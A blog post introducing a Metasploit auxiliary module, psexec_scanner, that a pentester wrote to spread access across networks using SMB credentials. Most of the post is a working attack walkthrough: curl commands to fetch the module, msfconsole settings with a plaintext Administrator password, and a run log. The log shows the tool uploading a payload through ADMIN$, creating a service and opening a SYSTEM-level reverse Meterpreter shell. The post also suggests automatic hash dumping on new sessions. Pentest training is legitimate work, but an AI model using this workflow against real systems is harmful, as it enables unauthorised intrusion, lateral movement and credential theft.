Some time ago I was talking with Martin Bos also know as @pure_hate one of the members of the Backtrack Development team and a Pentester and he mentioned that he would love to have a better way of using the psexec module that is already part on the framework in an easier way than using resource scripts which he had to modify and play with for each engagement. So I took it upon myself to help him out an write an auxiliary scanner module for him to use in egagements, at the same time Larry Pesce from Pauldotcom came to me with a similar requirement for when he is doing pentests against client environments and wanted to re-use the credentials he gathered inside the framework that are stored in the database so I came with the following requirements:

The module must Scan a range for port 445 TCP and only on those with the port open perform the attack.
have the ability to set the normal variables of the payload like LHOST and LPORT.
Provide the ability to specify additional options for the payload, specially for those that have extra advanced options like the Meterpreter HTTPS payload.
Accept the standard options for the psexec module.

The module i wrote can be found in my GitHub page at psexec_scanner. To use the module you need to do:

mkdir -p ~/.msf4/modules/auxiliary/scanner/smb/
cd ~/.msf4/modules/auxiliary/scanner/smb/
curl -O https://raw.github.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

Now we can use the module with any instance of the framework we load in the system making it easier to use across forks of the repository.

Now when we are inside msfconsole we can load the module and look at the options it provides:

msf > use auxiliary/scanner/smb/psexec_scanner 
msf  auxiliary(psexec_scanner) > show options 

Module options (auxiliary/scanner/smb/psexec_scanner):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   HANDLER    true                             no        Start an Exploit Multi Handler to receive the connection
   LHOST                                       yes       Local Hosts for payload to connect.
   LPORT                                       yes       Local Port for payload to connect.
   OPTIONS                                     no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD    windows/meterpreter/reverse_tcp  yes       Payload to use against Windows host
   RHOSTS                                      yes       Range of hosts to scan.
   SHARE      ADMIN$                           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain  WORKGROUP                        yes       SMB Domain
   SMBPass                                     no        SMB Password
   SMBUser                                     no        SMB Username
   THREADS    1                                yes       The number of concurrent threads
   TYPE       manual                           no        Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)

As we can see it takes 2 options when it comes to credentials one where we set one single credential to test against several systems or use the credentials found in the database for the current workspace. The credentials in the database will use those stored there in plain text or smb hash format so it will used those found via dumping hashes from target systems and those found thru bruteforcing like the smblogin modules. I did not add the bruteforcing part using a list of user and passwords since the smblogin module is much better suited for this task. Having the module use the options this ways makes it perfect for levering a initial compromise to some systems and expand it to a wider range.

Lets do a sample run against some target systems using a set of credentials I was able to obtain by other means and run it against a range. We start by setting the appropriate options for the payload, set a range to scan, credentials and the number of threads to use:

msf  auxiliary(psexec_scanner) > set LHOST  172.16.163.1
LHOST => 172.16.163.1
msf  auxiliary(psexec_scanner) > set LPORT 4444
LPORT => 4444
msf  auxiliary(psexec_scanner) > set RHOSTS  172.16.163.2-150
RHOSTS => 172.16.163.2-150
msf  auxiliary(psexec_scanner) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(psexec_scanner) > set SMBPass Newsystem01
SMBPass => Newsystem01
msf  auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10

Once we have all set we can launch the scan against the range:

msf  auxiliary(psexec_scanner) > run

[*] Using the username and password provided
#<#<Class:0x007fc88d91aef8>:0x007fc88c53c690>
[*] Starting exploit multi handler
[*] Started reverse handler on 172.16.163.1:4444 
[*] Starting the payload handler...
[*] Scanned 019 of 149 hosts (012% complete)
[*] Scanned 030 of 149 hosts (020% complete)
[*] Scanned 045 of 149 hosts (030% complete)
[*] Scanned 060 of 149 hosts (040% complete)
[*] Scanned 075 of 149 hosts (050% complete)
[*] Scanned 090 of 149 hosts (060% complete)
[*] Scanned 105 of 149 hosts (070% complete)
[*] Scanned 120 of 149 hosts (080% complete)
[*] 172.16.163.141:445 - TCP OPEN
[*] Trying Administrator:Newsystem01
[*] Connecting to the server...
[*] Authenticating to 172.16.163.141:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Scanned 136 of 149 hosts (091% complete)
[*] Created \tMxFrkje.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:172.16.163.141[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PKTFMpHK - "MHLGojYuKIPncRpRNJynImVk")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \tMxFrkje.exe...
[*] Sending stage (752128 bytes) to 172.16.163.141
[*] Meterpreter session 1 opened (172.16.163.1:4444 -> 172.16.163.141:49159) at 2011-12-15 20:23:52 -0400
[*] Scanned 149 of 149 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(psexec_scanner) > sessions -l

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2K8R2-01  172.16.163.1:4444 -> 172.16.163.141:49159

msf  auxiliary(psexec_scanner) >

A great way to keep leveraging would be to set in the options smart_hashdump and the credential modules as a macro to run against a session in the AutoRunScript option.

Hope you find this blog post useful as always.

Shell is Only the Beginning

PSExec Scanner Auxiliary Module